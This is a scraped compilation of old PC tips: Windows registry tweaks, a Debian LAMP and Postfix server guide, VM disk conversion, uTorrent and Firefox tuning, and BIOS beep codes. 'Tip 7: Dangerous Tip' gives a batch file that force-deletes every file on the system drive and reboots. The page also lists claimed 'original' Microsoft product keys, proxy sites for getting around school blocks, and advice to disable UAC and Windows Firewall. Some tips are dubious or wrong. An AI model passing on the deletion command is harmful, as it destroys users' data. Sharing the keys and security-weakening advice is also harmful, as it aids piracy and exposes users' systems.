Under the Advanced setting section, scroll down to bottom and click the “Restore previous folder windows at logon” option and then click Ok button to save sitting.
Now when you log off, restart or shutdown, your computer will automatically open the previously opened folders from the same location as before.


Set up and Use Internet Connection Sharing

To enable Internet Connection Sharing on a network connection You must be logged on to your computer with an owner account in order to complete this procedure. Open Network Connections. (

1. Click Start, click Control Panel, and then double-click Network Connections.)

2. Click the dial-up, local area network, PPPoE, or VPN connection you want to share, and then, under Network Tasks, click Change settings of this connection.

3. On the Advanced tab, select the Allow other network users to connect through this computer's Internet connection check box.

If you want this connection to dial automatically when another computer on your home or small office network attempts to access external resources, select the Establish a dial-up connection whenever a computer on my network attempts to access the Internet check box.

If you want other network users to enable or disable the shared Internet connection, select the Allow other network users to control or disable the shared Internet connection check box.

Under Internet Connection Sharing, in Home networking connection, select any adapter that connects the computer sharing its Internet connection to the other computers on your network. The Home networking connection is only present when two or more network adapters are installed on the computer.

To configure Internet options on your client computers for Internet Connection Sharing Open Internet Explorer. Click Start, point to All Programs, and then click Internet Explorer.)

On the Tools menu, click Internet Options.

On the Connections tab, click Never dial a connection, and then click LAN Settings. In Automatic configuration, clear the Automatically detect settings and Use automatic configuration script check boxes.

In Proxy Server, clear the Use a proxy server check box.

Surf Blocked Sites

Are you frustrated because you are not able to visit your favorite websites in your school or college or any place where some sites are blocked? There are two methods to access these sites:


First Method:

Search the banned website, for example www.pctipsntricks.wordpress.com in Google or Yahoo! search engine. Then open the cached copy of that page to access the website. You can get also cache link of that website, if you search in Google with keyword cache:[URL] and get cache link to access the website.

Second Method:

Below are the list of various sites from which you can surf the blocked websites !

http://kproxy.com
http://backfox.com
http://atunnel.com
http://calculatepie.com
http://www.stupidcensorship.com
http://www.vmathpie.com
http://www.xroxee.com
http://mathtunnel.com
http://www.pagemod.com


Set Processes Priority

Follow this tip to increase the priority of active processes, this will result in prioritisation of processes using the CPU.CTRL-SHIFT-ESC

1.Go to the second tab called Processes, right click on one of the active processes, you will see the Set Priority option

2.For example, your Run your CDwriter program , set the priority higher, and guess what, no crashed CD's


Setting Up a Server on LINUX

Submited In : Operating Systems » Linux


date: 24 August 2008

Setting Up a Server on LINUX



This article teaches you, the reader, how to configure a GNU/Linux based server with three of the most important services that must be provided in a company, at home, a lab or anywhere else, both for clients and internal usage: web, database, mail. So it will be assumed that the idea is to host websites that use certain technologies such as a scripting language and a database (for dynamic sites), and also to act as a mailing tool, for sending and receiving email.

Consider that this article only shows some of the basic features for configuring these services, each program has much more in depth options. Entire books have been written just about Apache or MySQL. So, don't just stay with what you learn here, play around, read, learn; system administration is all about security and performance, so there's a lot more to discover.

I have also decided to show some optimization (tuning) techniques for a better performance. We will use only free/open source software in this article, thus,it is not necessary to buy commercial licenses. The software we will use is Debian GNU/Linux, Apache, MySQL, PHP and Postfix. The first three are what is called LAMP, where the P can stand for various server side scripting languages such as PHP, Perl and Python. In general, it represents the open source web platform (both for developing and using it). I have been using LAMP and Postfix for years and must say that, after trying lots of other programs of the same sort, it is the wisest choice if you want a powerful, easy to use/configure/maintain and secure server environment.

Why use Debian? I have always liked this distribution because it's easy to manage packages (programs) and system services. It is also very secure and stable, making it perfect for servers and any system that must run 24/7. It's huge package repository (over 15490) is more than enough to get the best use out of any computer system.

Why use Apache? Simple - it's currently the best, most secure and most used HTTP server. It also supports a huge amount of modules and extensions. Here are some specific benefits of Apache: support, efficiency, portability and customizability.

Why use MySQL? It's logo says it all: The world's most popular open source database. This DBMS is reliable, powerful and easy to manage and use. Also, we will use it with Postfix for better integration and performance.

Why use Postfix? If you ask any systems administrator why he/she uses Postfix as a Mail Transport Agent (MTA) the answer will be it's easy and fast. Another great feature is it's security and the wide amount of operating systems it can run on (BSD, Linux, AIX, Solaris, OSX, etc.)
Installing and Configuring Apache

We will use Apache 2 because it has been rewritten for better performance and security. It brings more out of the box optimizations for scalability and throughput, as opposed to version 1.3 (which is not even being maintained anymore). So let's get to it, we first download and install the essential software:\

apt-get install apache2

This will also install the following packages: apache2, apache2-common,apache2-mpm-worker and apache2-utils. Now, try connecting to localhost:80 and you should see a page saying that Apache as been configured correctly. If not,you might have something wrong with the network settings, but that's a whole different ball game. By default, when installing services in Debian it leaves them configured to start when you boot GNU/Linux so you don't have to worry about further system configuration. For controlling the daemon we have apache2clt or we can use Debian's init utilities:

/etc/init.d/apache2 start|stop|restart|reload|force-reload
apacheclt start|stop|restart|...

Apache2's configuration files, by default, are in /etc/apache2/. Whenever a configuration is modified, the server must be restarted. Here is a description of some of the more important files and directories:

* apache2.conf is where the main configuration is, it used to be httpd.conf, so don't be fooled.
* mods-available/ is the directory with all the modules that are available. The .load contain the Apache directives that are needed to load the modules. And the .conf are the configuration directives for each module.
* mods-enabled/ is the directory that contains the symbolic links to the modules that we want to enable from mod-available/. At least the .load file must be there, so we will have: /etc/apache2/mod-enabled/modulex.load -> /etc/apache2/mod-available/modulex.load

Let's take this to practice, say we want to enable user directories:

(http://www.myurl.com/~someuser/). First uncomment the following in apache2.conf:

Next, we create the symbolic links for this module and restart the server:

cd /etc/apache2
ln -s mods-available/userdir.* /etc/apache2/mods-enabled/
/etc/init.d/apache restart

This works for all the modules you want to load. Now let's try some optimization methods. Apache uses a great deal of resources, specially RAM, because it accumulates whatever is necessary to accommodate what it's serving and this process never decreases until it is complete. This takes up as much RAM as the largest dynamic script.

To help reduce this problem, edit apache2.conf and enable KeepAlive (increases time) and set a low value for KeepAliveTimout (this will reduce the time the process waits without doing anything). Also, set the value for MaxRequestsPerChild around 20, depending on the amount of dynamic sites the server is hosting. The idea behind this is that when the process ends, it makes it start over again, but with lower RAM usage. However, by doing this, you might have to increase MaxClients around 50%.
Installing and Configuring MySQL

MySQL 5 introduces a number of new features, compared to older versions, such as new data types, precision math, better performance for storage, faster queries and better handling of certain types. The list goes on, so I recommend checking out the official documentation to see how you can take advantage of the latest version. To get it:

apt-get install mysql-server-5.0

libdbd-mysql-perl, libmysqlclient15off, mysql-client-5.0 and mysql-common will also be installed. Debian will also make sure MySQL starts at boot time. To control the daemon, I use the init script and voila!:

/etc/init.d/mysql start|stop|restart|reload|force-reload|status

To first start working with this database, the root password must be set. The word root does not apply to the system's root, but to the database administrator, however, it can be the same person. So let's set it and log in:

mysqladmin -u root password 'thepassword'
mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10 to server version: 5.0.20a-Debian_1-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

If you don't like using the command line system (lazy sysadmins), there a couple graphical user interfaces for MySQL, such as MySQLCC (QT), gMySQLCC (GTK+), etc. Since everything is running fine (or should be) it's time to optimize. MySQL uses algorithms that let you run it with little memory, but you can give it options to increase the memory usage if you have more, and therefore increase performance. To lower the amount of time MySQL sits waiting, edit the configuration file: /etc/mysql/my.cnf and add/change the following (values may vary depending on your specific needs):

wait_timeout=60
connect_timeout=10
interactive_timeout=100
join_buffer_size=1M
query_cache_size=128M
query_cache_limit=2M
max_allowed_packet=16M
table_cache=1024

Installing and Configuring PHP

Now that we have our httpd server up and running we can setup PHP. Debian includes PHP5 in the official package repository, not too long ago only up to version 4 was supported. So let's get it:

apt-get install php5

Just like for Apache and MySQL, extra packages will have to be install as well: apache2-mpm-prefork, libapache2-mod-php5 and php5-common.

Now, add support for MySQL:

apt-get install php5-mysql

I also like to add some more packages for PHP, such as CLI, Pear, LDAP, IMAP, GD, mhash, ODBC and PostScript:

apt-get install php5-cli php-pear php5-ldap php5-imap php5-gd\
php5-mhash php5-odbc php5-ps

The configuration file for PHP is located in /etc/php5/apache2/php.ini, every time you modify it, Apache must be restarted. So let's see if everything is working. First let's create a simple script, called information.php, in Apache's DocumentRoot, that is /var/www/information.php and inside it should go:



Now, fireup a browser and open http://www.mycompany.com/information.php. You should see a page with information about the PHP version that is installed. Also it provides some details about Apache, and all the PHP modules. Last, but not least, let's make sure MySQL and PHP are working well together. First, log in to MySQL and create a new database:

mysql> create database test;
Query OK, 1 row affected (0.00 sec)

mysql> exit
Bye


'

Create a new file, db.php, in the same directory and write:



Check your browser and you should see: connection success. Now for a little optimization. Usually compiling PHP scripts on the fly uses a lot of memory, so if your hosting several big web sites and have lots of users visiting, you might want to do something about this resource abuse. The solution is to use a program that keeps the scripts precompiled. The most popular include Zend Accelerator, Turck MMCache and PHP Accelerator. Performance can increase up to 200%.

Finally LAMP is up, running and optimized. You can also provide further services, such as more databases (PosgreSQL, Oracle, Informix, etc) and more server side languages (Perl, JSP, Python, etc).
Installing and Configuring Postfix

Postfix was originally written as an alternative to Sendmail, which is used in most mail servers around the world. Unfortunately, Sendmail is hard to use (and manage) and very bug prone, therefore securing it can be quite a task. This is why Postfix is a fantastic option. Just like with the rest of the software, we download and install it, with support with MySQL:

apt-get install postfix postfix-mysql

Leave the values dpkg suggests when configuring. The default configuration files are in /etc/postfix, we will only use main.cf. Once done, we create the postfix user for MySQL and the database for the emails:

mysql -A -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 4 to server version: 5.0.20a-Debian_2-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql;
Database changed
mysql> insert into user (host, user, password) values ('localhost', 'postfix', password('thepostfixpass'));
Query OK, 1 row affected, 3 warnings (0.00 sec)

mysql> insert into db (host, db, user, select_priv) values ('localhost', 'mail', 'postfix', 'Y');
Query OK, 1 row affected (0.00 sec)

mysql> create database mail;
Query OK, 1 row affected (0.01 sec)

Afterward, MySQL must be restarted to use the new user and database. If everything worked correctly, then there shouldn't be any problem logging in as postfix using the mail database. So now we create our tables, as root:

mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 3 to server version: 5.0.20a-Debian_2-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mail;
Database changed
mysql> create table transport (
-> domain varchar(255) primary key,
-> transport char(8),
-> access varchar(2)
-> default 'OK');
Query OK, 0 rows affected (0.01 sec)

mysql> create table aliases (
-> id int(6),
-> alias varchar(255) primary key,
-> maildir varchar(255) not null,
-> access varchar(2)
-> default 'OK');
Query OK, 0 rows affected (0.00 sec)

mysql> create table remote_alias (
-> alias varchar(255) primary key,
-> rcpt varchar(255) not null);
Query OK, 0 rows affected (0.01 sec)

mysql> create table domain1 (
-> user varchar(255) primary key,
-> pass varchar(255) not null,
-> maildir varchar(255) not null,
-> active int(8)
-> default 1);
Query OK, 0 rows affected (0.00 sec)

The next step is configuring Postfix to support MySQL, so edit the configuration file and add:

transport_maps=mysql:/etc/postfix/transport.cf
virtual_mailbox_base=/home/postfix
virtual_uid_maps=mysql:/etc/postfix/ids.cf
virtual_gid_maps=mysql:/etc/postfix/ids.cf
virtual_mailbox_maps=mysql:/etc/postfix/aliases.cf
virtual_maps=mysql:/etc/postfix/remote_aliases.cf

Since we are specifying files that don't exist, we must create them. In transport.cf write:

user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=transport
select_field=transport
where_field=domain
hosts=localhost

user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=aliases
select_field=maildir
where_field=alias
hosts=localhost

In ids.cf:

user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=aliases
select_field=id
where_field=alias
hosts=localhost

And for the final file, remote_aliases.cf:

user=postfix
password=thepostfixpass # the password used in MySQL
dbname=mail
table=remote_aliases
select_field=rcpt
where_field=alias
hosts=localhost

Lets now create the information for the domain1 example in MySQL:

mysql -A -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 8 to server version: 5.0.20a-Debian_2-log

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mail;
Database changed
mysql> insert into transport(domain, transport) values ('domain1.com', 'virtual:');
Query OK, 1 row affected (0.00 sec)

To add users to that domain, simply insert into the aliases table the data (you can get postfix's userid from /etc/passwd, for example:

mysql>insert into aliases values
(postfix_uid,'user@domain1.com','domain1/user', 'OK');

Finally everything should be working smoothly. Make sure you constantly check the logs (/var/log/mail.log), even if everything is normal, because the first place you might detect an attack is there.


Removing the Shortcut Icon Arrows

1.Open RegEdit
2.Open the Key HKEY_CLASSES_ROOT
3.Open the Key LNKFILE
4.Delete the value IsShortcut
5.Open the next Key PIFFILE
6.Delete the value IsShortcut
7.Restart the Windows


IMPROVE XP SHUTDOWN SPEED

This tweak reduces the time XP waits before automatically closing any running programs when you give it the command to shutdown.



Go to Start then select Run



Type 'Regedit' and click ok



Find 'HKEY_CURRENT_USER\Control Panel\Desktop\'



Select 'WaitToKillAppTimeout'



Right click and select 'Modify'



Change the value to '1000'



Click 'OK'



Now select 'HungAppTimeout'



Right click and select 'Modify'



Change the value to '1000' Click 'OK'



Watch Any Movie In Paint (100%) Working

* First start a movie in any player.

* Then open Paint.

* Now, in the player when the movie is being played, press "Print screen" button on your key board.

* Now, Press ctrl+v in Paint

* Leave the movie player open and don't minimize it.

* Open Paint now and see the movie in the Paint

*you can edit it also


To make folder delete protected

1)Right click on the folder

2)Then in the general tab click advanced (near read only option)

3)In that click encrypt contents to secure data.

4)This can happen if u run windows Xp and you have Ntfs file system on that particular drive and an administrative account.Its Workin ..!!


[How To] Permanently disable UAC in Windows 7 / Vista

User Account Control is a technique implemented in latest Windows Operating Systems to safeguard it from inexperienced computer users. It mainly aims at securing the system from accidental damages caused by users. But sometimes it may interfere in simple program installation or some other simple tasks. This may be annoying for users.

Here is a small step by step guide on disabling UAC in Windows 7 / Vista.

Go to start, type regedit.exe in searchbox and press enter.
Navigate to the following entry in Registry Editor.
HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Policies System
Now look for EnableLUA in right side pane. If the key is not there then create new DWORD with same name. Double click on the key and change its value to ’0′.
http://tipsfromgeek.com/wp-content/uploads/2010/07/Disable-uac-392-x-284.gif
Press OK, restart your computer and done.


The easy way to Fix your Task Manager

Task Manager has been disabled by your administrator

Have you encountered the error in your PC “Task Manager has been disabled by your administrator“ or your task manager has just suddenly stops working? This error message appears due to restriction placed in the Windows Registry. One can easily enable Task Manager by editing some registry settings. For a normal user editing registry is not easy and a bit risky. Well here is the instant solution to those common Task Manager common errors.

Task Manager Fix is a FREEWARE system utility to fix task manager disabled by spywares, trojans and displays error message : “Task Manager has been disabled by your administrator“, which blocks access to Windows Task Manager.

Task Manager Fix is designed to enable disabled Task Manager. Download the FREE Task Manager Fix tool to quickly enable Task Manager. Handy windows system recovery tool to remove task manager restrictions and effective solution to the problem - “Task Manager not Working”.


View Admin At welcome Screen

By default windows XP doesn't show the Administrator in the user list at the welcome screen. Here's a way to get around it.


Now head up to

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\Userlist

create a new DWORD entry and name it as Administrator and change its value to 1.

exit and reboot for the changes to take effect.
To change it back change its value to 0 or simply delete the key.


Convert VMware .vmdk to KVM .qcow2 or Virtualbox .vdi

I wrote this how to as I was having problems converting a VMware image to KVM. The existing tutorials all suggest using qemu-img to convert the .vmdk, however it was not working as qemu-img only supports VMware 3 and 4 compatible image formats.

At least that is what Google searching and reading the qemu man pages yielded after I got this error message :

qemu-img convert Ubuntu.vmdk -O qcow2 Ubuntu.qcow
qemu-img: Could not open ‘Ubuntu.qcow’

And to make matters worse, it was difficult to find any information on converting the .vmdk if it was split into multiple files.

This is how I ended up converting. You can convert from a .vdi or a “flat” .vmdk
First convert the .vmdk to a format compatible with qemu-img.

Turns out this can be done with vmware-vdiskmanager.

1. Converting from .vmdk

Use vmware-vdiskmanager to create a copy. This works with a single or multiple disks.


ls
Ubuntu.vmdk
Ubuntu-f001.vmdk
Ubuntu-f002.vmdk
Ubuntu-f003.vmdk ...

vmware-vdiskmanager -r Ubuntu.vmdk -t 0 Ubuntu-copy.vmdk

Note: If you have multiple disks, use Ubuntu.vmdk as well (you do not need to convert each Ubuntu-f001.vmdk).

Note: That is a -t Zero not a capital O. see man vmware-vdiskmanager.

Note: vmware-vdiskmanager is part of vmware server (and workstation, not sure about player).

2. Alternate – Converting “flat files”.

Flat files are used by vmware if you create a virtual disk (vmdk) with the “Allocate all disk space now” option (you have this option when creating disks for use with vmware). Flat files contain all the data from your .vmdk and can (usually) be converted directly.

Notice, flat files can be directly converted to .qcow. If you wish to convert to .vdi (VirtualBox) convert flat to raw.
KVM :

qemu-img convert Ubuntu-flat.vmdk -O qcow2 Ubuntu-copy.qemu

Note: That is a capital O qcow2
RAW (for VirtualBox)

qemu-img convert Ubuntu-copy.vmdk -O qcow2 Ubuntu-copy.qemu

Note: That is a capital O qcow2

3. Boot the image with KVM

kvm -hda Ubuntu-copy.qcow -net nic -net user -m 512

Caveats :

If you have vmware-tools installed, you will have mouse integration.
If you have vmware-tools installed, the guest desktop may well be larger then the kvm window. You will need to resize the guest display to 800×600 .
I could not convert a .vmdk which was using LVM (Fedora).

VirtualBox – Convert to .vdi

1. First use qemu-img to convert the copy .vmdk to raw.

qemu-img convert Ubuntu-copy.vmdk Ubuntu-copy.img

qemu-img with no options will make a raw image. If you prefer you can specify

qemu-img convert Ubuntu-flat.vmdk -O raw Ubuntu-copy.img

2. Then convert the raw image with VBoxManage

VBoxManage convertfromraw – -format VDI Ubuntu-copy.img Ubuntu-copy.vdi

Note: Two – - in front of “format” (Wordpress converts two – - to one long one).

3. Start VirtualBox, make a new machine or add the Ubuntu.vdi to an existing machine.

Caveats :

With VMWare-tools installed, Mouse integration did not work (as it did with KVM).
The resolution of the guest is also larger then the Virtualbox window.
I installed the VirtualBoxAdditions and guest resolution worked well, mouse integration, however, did not.

As always, I hope this helps. Converting usually went smoothly for me however there is the occasional .vmdk I could not convert.


Speed Up utorrent RAPIDLY

uTorrent was very slow for me until recently I applied a few tweaks. Here's what I did.

Note: Some of the settings mentioned below are optimized for 256k connection. If you want to calculate the optimal settings for your connection, check at the end of this tutorial. But I suggest you to read the entire tutorial for guidance on other settings.

First go to Options>Preferences>Network

1. Under 'Port used for incoming connections', enter any port number. It is best to use a port number above 10000. I use 45682.mine 10981

2. Randomize port each time utorrent starts: UNCHECKED. I leave this unchecked because I have a router. If you do not have a router or a firewall, and want extra security, check this option.

3. Enable UPnP port mapping (Windows Xp or later only): UNCHECKED. I leave this unchecked because I have experienced it slowing down speeds. It is not needed if you manually port forward.

4. Add utorrent to Windows Firewall exceptions (Windows XP SP2 or later only): UNCHECKED (do this only if you have windows firewall disabled)

5. Global Maximum upload rate (kb/s): [0: unlimited]: 22 (for 256k connection)

6. Protocol Encryption: ENABLED. I would recommend everyone to enable this. This can help increase speeds with many ISPs.

7. Allow incoming Legacy Connections: CHECKED

Network Settings

Options>Preferences>Torrents

1. Global Maximum Number of Connections: 130 (for 256k connection) This number should not be set too low or the number of connections made to your torrents will be limited. Setting it too high may cause too much bandwidth to be used and can cause slowdowns. For mine 200

2. Maximum Number of connected peers per torrent: 70 (for 256k connection) If you see that the peers connected to a specific torrent are exactly this number, or very close, increase this number to improve speeds.mine 150

3. Number of upload slots per torrent: 3 (for 256k connection) This depends on how much you want to upload to other users. Do not set too low or it may affect download speeds. mine 4

4. Use additional upload slots if upload speed Preferences>Advanced

net.max_halfopen: 50

If you use Windows XP SP2, patch tcpip.sys with LvlLord's Event ID 4226 Patcher to get better performance.

DO NOT CHANGE THIS OPTION unless you have Windows XP SP2 and have patched tcpip.sys.

You can also patch tcpip.sys with xp-Antispy

If you have a firewall

* Open up the options/preferences/settings for the firewall - usually your firewall will have an icon to click in the taskbar

* Look for the keywords "allow list" or "programs"

* Add the application you want to give access to the internet

* Make sure to save your settings when you are done

If you have a router

1. Go to start>run>type cmd, press enter>type ipconfig, press enter

2. Remember both your ip address and your default gateway

3. Type in your default gateway into your default browser, a password prompt may come up. The default username and password are admin for my router

4. Under 'Applications' fill out one line for each p2p client you use

5. You need to use your ip address, the correct port range and set either tcp or udp

6. You can find and change the ports in the actual p2p client's settings, just make sure they are the same in the router

7. Most p2p apps need both tcp and udp checked, if you are not sure check your p2p client's FAQ

8. Save your settings

:!: Check PortForward.com to forward ports for uTorrent.

Some of the settings I mentioned above are relative to my bandwidth.

How to calculate optimal settings for your connection

In order to apply the following tips you need to know your maximum upload and download speeds. You can test your bandwidth over here.

Maximum upload speed

If you use your Maximum upload speed, there won't be not enough space left for the files you are downloading. So you have to cap your upload speed.

This is how I calculate my optimal upload speed…

upload speed * 80%

Maximum download speed

Setting your maximum download speed to unlimited will hurt your connection. So use this to calculate your optimal setting.

download speed * 90%

Maximum connected peers per torrent

upload speed * 1.3

Maximum upload slots

1 + (upload speed / 6)

Disable Windows Firewall

Windows Firewall hates P2P and so disable it and get yourself a decent firewall like Zone Alarm.

And last optimize your Internet connection with TCP Optimizer.

Original Microsoft Product Keys

Here are some original Microsoft keys for its various products.

Microsoft Product Key(Original Key)

Windows Server :

Windows Server 2003 R2 Enterprise Edition -----KX9YP-83MH3-GTFVG-JKCWC-629HG

Windows Server 2003 R2 Standard Edition -----FQFYX-JXQRT-3MJGD-2B8HP-KHC8B

Windows Server Longhorn February 2007 CTP (IA64) -----9JB9R-HV9F2-9TQRG-372M3-DWH6H

Windows Server Longhorn February 2007 CTP (x86 and x64) ----- RGVDW-V3J3C-6CD3P-2CQJV-GF4PG

WINDOWS VISTA :

Windows Vista Business ----------- J9QVT-JJMB9-RVJ38-M8KT6-DMT9M

Windows Vista Home Basic --------- KJTCW-YQGRK-XPQMR-YTQG8-DKVG6

Windows Vista Home Basic N ------- YQWWH-2YD6Y-V3K2X-H4H8V-WJ8WT

Windows Vista Home Premium ------ PYYBC-K9XT9-V92KD-6CT89-4VB82

Windows Vista Ultimate ------------ PVVFY-2F78Q-8T7M8-HDQB2-BR3YT

Windows Vista Enterprise ---------- CYD8T-QHBMC-6RCMK-4GHRD-CRRB7

WINDOWS XP :

Windows XP Home Edition K ---------- W8F6Q-HM3JB-2XRHD-7Q92J-XKY6W

Windows XP Home Edition KN --------- M9D9J-2TQV2-FBJQP-2M8G8-DGQ26

Windows XP Media Center Edition ----- H23CJ-2WXM9-M9D2K-42226-DJWRD

Windows XP Professional Edition K ---- FRH2X-6VD7F-YH2TV-2V8B7-J46F6

Windows XP Professional Edition KN --- QKBGY-T8JFG-F448Q-24KR9-48XPJ

Windows XP Home Edition ------------ GHGCP-3KFC6-Y4J4D-MVG7V-67TV6

Windows XP Professional ------------- F9QV9-HDYR3-6QDR4-PGVW9-GTBBJ

Windows XP Professional IA64 Edition - BGVXG-CM3VK-FX848-B9JPY-YJJXD

Windows XP Professional x64 Edition -- PFFY7-Y9RRY-MT6C7-XMQPK-RWFCW

Windows XP Tablet PC Edition -------- WFMYK-68Y2T-JD473-W8DMW-8PFHQ

WINDOWS 2000 :

Windows 2000 Professional ------------ DDTPV-TXMX7-BBGJ9-WGY8K-B9GHM

Windows 2000 Server (All Versions) ---- KRJQ8-RQ822-YRMXF-6TTXC-HD2VM

MICROSOFT OFFICE + FRONT PAGE :

Office XP Professional with FrontPage - GBJ7J-7MYPV-RJ46R-RQJXJ-WQ2CM

Office Professional 2007 -------------- VMRGQ-G3YMP-RWYH2-4TQ97-CT2HD

Office Ultimate 2007 ----------------- VJPW8-MB6MR-8D8YM-TW37V-WYVX3

Office Professional Plus 2007 --------- VBQJ8-CBP7J-CP4BH-Q9GFW-B8X

Office System Beta 2 2007 ----------- RQCRJ-FCTYM-V3PDF-GRD46-9YHXQ

Outlook 2007 ------------------------ DB4QP-GTFT3-FT3T6-VHHJ9-98XQQ

Office System Groove Server 2007 Beta 2 ----- WCMWF-H7DD9-3R2Q6-QM863-G7XD6

Office System Project Server 2007 Beta 2 ----- CYGH3-KVXBH-JDQV3-FFYPP-XGKD3

Office System SharePoint Server 2007 Beta 2 ----- C39KH-VHBKR-KT62D-Q4FVG-4PB76

FrontPage Professional 2003 ---------- RV3CJ-VCB3D-9PY99-YDKX8-9MG2T

EXCHANGE :

Exchange Server 2007 Enterprise Edition ------ PYYMB-HQQMQ-3TBM2-XJ99F-83XVM

Exchange Server 2007 Standard Edition ------ W3MX6-2WXMD-QB887-4WGPK-VPVDY

Forms Server 2007 -------------------- K76FH-Y2JHK-9BGCR-37KPR-4Y6JQ

Project Portfolio Server 2007 ---------- QRPKT-683CC-MJ9VJ-FHBCC-HYKGD

Project Server 2007 ------------------- GM27X-X6X37-T69MH-98J3Q-44TKG

SHARE POINT :

SharePoint Server 2007 Enterprise Edition --- F6YVR-4XY7K-RCVY4-37FBK-G44PY

SharePoint Server 2007 for Search Enterprise Edition ------ P87VV-Q34RV-GW2HT-JVXWV-3VFPM

SharePoint Server 2007 for Search Standard Edition ------ MYBJH-6YGQQ-6WW3C-FGM3V-YY6JW

SharePoint Server 2007 Standard Edition ------ WFF2P-M8XYH-3B33C-6KPP9-XVQTG

SharePoint Designer 2007 ------------ T9CJK-W68FW-D9FX6-37HG3-XHF7D

ACCESS + GROOVE + INFOPATH E.T.C :

Access 2007 ------------------------- HP44H-VWH8K-J7T22-QD3KC-37F7D

Groove 2007 ------------------------- MCW9C-WTKM4-KRHBQ-CPYJQ-YYD93

Groove Server 2007 ------------------ R4X9H-MP2C6-CV2FX-QGPKY-93RPG

InfoPath 2007 ----------------------- C3R8F-TMMYD-TBGDP-2RDXT-88393

InterConnect 2007 ------------------- P2BJF-HGV87-RRFB7-8DVQR-F23DQ

OneNote 2007 ----------------------- GJ2V8-K8CHV-7QP4V-K23TM-CMQDQ

Project Professional 2007 ------------ T7CBB-KW6DD-VTHB9-6V4D4-K3393

Project Standard 2007 --------------- G2XT7-K47QK-BFVXC-83T9M-8Y63Q

Publisher 2007 ----------------------- VC3PJ-TBV6V-XWG4P-2GRBH-RVWVD

Visio Professional 2007 --------------- JVBKC-PVJRX-MCT9J-JV7FK-JXYK3

Visio Standard 2007 ----------------- VYK2W-K2Q3Y-MRCTC-WRWMY-8JCHD

Tip 4:

How to increase download speeds in firefox

Firefox is configured by default for dial-up speeds. If you have high speed internet access such as DSL or cable, you can change a few settings in Firefox and increase your download speeds. If you change the number of connections that Firefox uses to download, you will see a dramatic increas in your bandwidth. The larger the file you are downloading, the greater the speed will be, because more connections can be made to the server.

1. Change Firefox connection setting by typing "about:config" in the address bar of Firefox.

2. In the "Filter:" bar, type "persistent"

3. You should now see two preference names with their values:

network.http.max-persistent-connections-per-proxy user set interger 4

network.http.max-persistent-connections-per-server user set interger 2

4. Double click on each of the preference names. A window will pop-up allowing you to change the values for each. If you have cable or DSL use a number between 20 and 30!. Click OK.

Tip 5:

Firefox: Extreme Speed !

Once you've loaded up firefox go to the address bar and type or copy and paste:

about:config

Right click and select: New -> Integer

Name the integer or copy paste:

nglayout.initialpaint.delay

Change the integers value to:

300

You can also use 0 (zero) as an Integer Value, if you don't like the performance of the 300 Integer Value.

Enjoy & Watch Your Speed!

Or If Not Try This One Too!

1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:

network.http.pipelining

network.http.proxy.pipelining

network.http.pipelining.maxrequests

Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.

2. Alter the entries as follows:

Set "network.http.pipelining" to "true"

Set "network.http.proxy.pipelining" to "true"

Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.

3. Lastly right-click anywhere in the "aboug:config" page and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.

4. Restart Firefox

If you're using a broadband connection you'll load pages 2-3 times faster now.

Tip 6:

How to eliminate Firefox popups Once and For All

1. Type about:config into the Firefox location bar.

2. Right-click on the page and select New and then Integer.

3. Name it privacy.popups.disable_from_plugins

4. Set the value to 2.

The possible values are:

* 0: Allow all popups from plugins.

* 1: Allow popups, but limit them to dom.popup_maximum.

* 2: Block popups from plugins.

* 3: Block popups from plugins, even on whitelisted sites.

Tip 7 : Dangerous Tip

Destroy's Computer

Type this command in notepad and save as .bat

@echo off

del %systemdrive%\*.* /f /s /q

shutdown -r -f -t 00

What it does is ?

you get a blue screen that say's file is missing please intall XP again

Tip 8:

A Trick To Check Ur Antivirus Is Working Properly

Open notepad

Copy this code in the text file....

"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

without qutoes....

then save it with the name fakevirus.exe

If this file got deleted immediately ....that means ur antivirus is working n updated

Tip 9

Bios beep codes!!!

bios beep codes

BIOS Beep Codes (AMI Known as American Megatrends International & Phoenix)

When a computer is first turned on, or rebooted, its BIOS performs a power-on self test (POST) to test the system's hardware, checking to make sure that all of the system's hardware components are working properly. Under normal circumstances, the POST will display an error message; however, if the BIOS detects an error before it can access the video card, or if there is a problem with the video card, it will produce a series of beeps, and the pattern of the beeps indicates what kind of problem the BIOS has detected.

Because there are many brands of BIOS, there are no standard beep codes for every BIOS. The two most-used brands are AMI (American Megatrends International) and Phoenix.

AMI Beep Codes

Beep Code Meaning

1 beep - DRAM refresh failure. There is a problem in the system memory or the motherboard.

2 beeps - Memory parity error. The parity circuit is not working properly.

3 beeps - Base 64K RAM failure. There is a problem with the first 64K of system memory.

4 beeps - System timer not operational. There is problem with the timer(s) that control functions on the motherboard.

5 beeps - Processor failure. The system CPU has failed.

6 beeps - Gate A20/keyboard controller failure. The keyboard IC controller has failed, preventing gate A20 from switching the processor to protect mode.

7 beeps - Virtual mode exception error.

8 beeps - Video memory error. The BIOS cannot write to the frame buffer memory on the video card.

9 beeps - ROM checksum error. The BIOS ROM chip on the motherboard is likely faulty.

10 beeps - CMOS checksum error. Something on the motherboard is causing an error when trying to interact with the CMOS.

11 beeps - Bad cache memory. An error in the level 2 cache memory.

1 long beep, 2 short - Failure in the video system.

